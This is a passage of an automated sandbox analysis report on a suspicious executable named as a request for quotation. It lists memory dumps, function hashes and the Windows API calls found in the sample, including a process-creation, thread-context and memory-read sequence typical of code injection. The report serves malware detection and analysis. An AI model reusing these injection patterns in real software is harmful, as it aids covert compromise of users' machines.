                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 3902256705-0
                                                                                • Opcode ID: a1c4870ae67c25cf443983c81cfea13b426b6c380140abe28f3bf244e2cf3b27
                                                                                • Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
                                                                                • Opcode Fuzzy Hash: a1c4870ae67c25cf443983c81cfea13b426b6c380140abe28f3bf244e2cf3b27
                                                                                • Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD
                                                                                APIs
                                                                                  • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                • __lock_file.LIBCMT ref: 004253EB
                                                                                  • Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34
                                                                                • __fclose_nolock.LIBCMT ref: 004253F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                • String ID:
                                                                                • API String ID: 2800547568-0
                                                                                • Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                                                • Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
                                                                                • Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                                                • Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E
                                                                                APIs
                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00B75D6D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 1263568516-0
                                                                                • Opcode ID: e5474385944eaf411f401b02cb83e95e553a9b73f6dfd76a841b0f1a69654c67
                                                                                • Instruction ID: 52d795665323ba551728d655ec6f1cc4215b4d5cddade3281fa7d3e5abafc4a6
                                                                                • Opcode Fuzzy Hash: e5474385944eaf411f401b02cb83e95e553a9b73f6dfd76a841b0f1a69654c67
                                                                                • Instruction Fuzzy Hash: C6F05461E04F44EADA7E13A8ED5EF712AD0E712768F0DC1F9A27E6A0B28AD55C05C502
                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(?,00000000), ref: 00E7FDDB
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E7FE71
                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00E7FE93
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1541781702.0000000000E7E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E7E000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_e7e000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 2438371351-0
                                                                                • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                • Instruction ID: 3b688b014610990404be1af01541af4c9cb4192d80cf7eb5d748b75410b97645
                                                                                • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                • Instruction Fuzzy Hash: C612CF24E14658C6EB24DF64D8507DEB232EF68300F10A0E9910DEB7A5E77A4F85CF5A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8ad92c75d5b58e26a038aa2b40548f7337b234e1f040ce9e88db91f0e8bd2a94
                                                                                • Instruction ID: 610e4d70b18777f01344b80302360078e7a47224ac0db6c58752072ab3ad914a
                                                                                • Opcode Fuzzy Hash: 8ad92c75d5b58e26a038aa2b40548f7337b234e1f040ce9e88db91f0e8bd2a94
                                                                                • Instruction Fuzzy Hash: A971D53190CF804EC73647288898675BBE1EB62320F5DC6DAD0BD9F1E2D2F19E459792
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: eb52a48e15a34e9a74e2031e247252cdeb986a8c7bfdc1cc883336b91a589da9
                                                                                • Instruction ID: 34bad5b9cf9f02f9b8cdeb08493a80c9e1c05787e9aaaa4c63d02035a25de6d3
                                                                                • Opcode Fuzzy Hash: eb52a48e15a34e9a74e2031e247252cdeb986a8c7bfdc1cc883336b91a589da9
                                                                                • Instruction Fuzzy Hash: 9531A56190CF408ECB358B28C488339BBF0EBA1750F49C5DAD0BD9A2E2D6758D08D752
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ClearVariant
                                                                                • String ID:
                                                                                • API String ID: 1473721057-0
                                                                                • Opcode ID: 3d1cb9615f3ea5f5f5e6361dd344e1a47d9da12f05ea6428eae25d07ae27aef1
                                                                                • Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
                                                                                • Opcode Fuzzy Hash: 3d1cb9615f3ea5f5f5e6361dd344e1a47d9da12f05ea6428eae25d07ae27aef1
                                                                                • Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _memmove
                                                                                • String ID:
                                                                                • API String ID: 4104443479-0
                                                                                • Opcode ID: 9020231d3715f36c038b75c9c733c79e702cd2adbd383d6332c87f1fdd559c74
                                                                                • Instruction ID: e277250e627d10e0330490a348a3b32a96e3d7cb5ffc8e96ca57e5c84c001af0
                                                                                • Opcode Fuzzy Hash: 9020231d3715f36c038b75c9c733c79e702cd2adbd383d6332c87f1fdd559c74
                                                                                • Instruction Fuzzy Hash: 86210072A14A19EBDB108F26E84176E7BB4FB18354F21853FE886C51D0EB38E490D74E
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _memmove
                                                                                • String ID:
                                                                                • API String ID: 4104443479-0
                                                                                • Opcode ID: f7e62a8e1c5e2c2480a96847b068e2bf3622822eade55fefb08bb6a489eda471
                                                                                • Instruction ID: 03ec0e1ddcc1c42b0f32453fdad85b9eaadac3e2e088d633c8de65ee5d072679
                                                                                • Opcode Fuzzy Hash: f7e62a8e1c5e2c2480a96847b068e2bf3622822eade55fefb08bb6a489eda471
                                                                                • Instruction Fuzzy Hash: 4111D532A04215ABD714EF28D485C6AB7A9EF85324724812FE905DB3D1DB35FC01C799
                                                                                APIs
                                                                                  • Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF
                                                                                  • Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                                                  • Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4
                                                                                  • Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Free$Load__wfsopen_memmove
                                                                                • String ID:
                                                                                • API String ID: 1396898556-0
                                                                                • Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                                                • Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
                                                                                • Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                                                • Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ClearVariant
                                                                                • String ID:
                                                                                • API String ID: 1473721057-0
                                                                                • Opcode ID: 1d552beb7b604a3469ce90b415d42699b56cfd27380834e93100c85a5b232174
                                                                                • Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
                                                                                • Opcode Fuzzy Hash: 1d552beb7b604a3469ce90b415d42699b56cfd27380834e93100c85a5b232174
                                                                                • Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: FilePointer
                                                                                • String ID:
                                                                                • API String ID: 973152223-0
                                                                                • Opcode ID: 978d2fec6b7866ee20f8d72aaf39741cc29443217321bcd9332a93acee2defed
                                                                                • Instruction ID: aa46907df652eae10760f067dc0fd3ce9c96de3746f3f1900f44b7bc243beff3
                                                                                • Opcode Fuzzy Hash: 978d2fec6b7866ee20f8d72aaf39741cc29443217321bcd9332a93acee2defed
                                                                                • Instruction Fuzzy Hash: CA01967180DB409FCB398B2484487357BF4EF56350F49DADAE1BDAB1A2D6708D04CB52
                                                                                APIs
                                                                                • __lock_file.LIBCMT ref: 004248A6
                                                                                  • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd_noexit__lock_file
                                                                                • String ID:
                                                                                • API String ID: 2597487223-0
                                                                                • Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                                                • Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
                                                                                • Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                                                • Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                                                • Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
                                                                                • Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                                                • Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84
                                                                                APIs
                                                                                • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                                                  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: LongNamePath_memmove
                                                                                • String ID:
                                                                                • API String ID: 2514874351-0
                                                                                • Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                                                • Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
                                                                                • Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                                                • Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: __wfsopen
                                                                                • String ID:
                                                                                • API String ID: 197181222-0
                                                                                • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                • Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
                                                                                • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                • Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1541781702.0000000000E7E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E7E000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_e7e000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                • Instruction ID: a6e47c53580487e074d5610b5f303d1b03cce7a805c3a898dd4c094b101d2a2f
                                                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                • Instruction Fuzzy Hash: 1FE0BF7494010DEFDB40EFA4D6496DE7BB4EF04311F1005A1FD05E7680DB309E649A66
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1541781702.0000000000E7E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E7E000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_e7e000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                • Instruction ID: 06f489253fa8036f56e4051a6c115566f3771f880290945e777a698f0ffe089a
                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                • Instruction Fuzzy Hash: 10E0E67494010DDFDB40EFB4D64969E7FB4EF04311F100161FD05E2280D6309D609A62
                                                                                APIs
                                                                                  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
                                                                                • SendMessageW.USER32 ref: 0048CC29
                                                                                • _wcsncpy.LIBCMT ref: 0048CC95
                                                                                • GetKeyState.USER32(00000011), ref: 0048CCB6
                                                                                • GetKeyState.USER32(00000009), ref: 0048CCC3
                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
                                                                                • GetKeyState.USER32(00000010), ref: 0048CCE3
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
                                                                                • SendMessageW.USER32 ref: 0048CD33
                                                                                • SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
                                                                                • SetCapture.USER32(?), ref: 0048CE69
                                                                                • ClientToScreen.USER32(?,?), ref: 0048CECE
                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
                                                                                • ReleaseCapture.USER32 ref: 0048CF00
                                                                                • GetCursorPos.USER32(?), ref: 0048CF3A
                                                                                • ScreenToClient.USER32(?,?), ref: 0048CF47
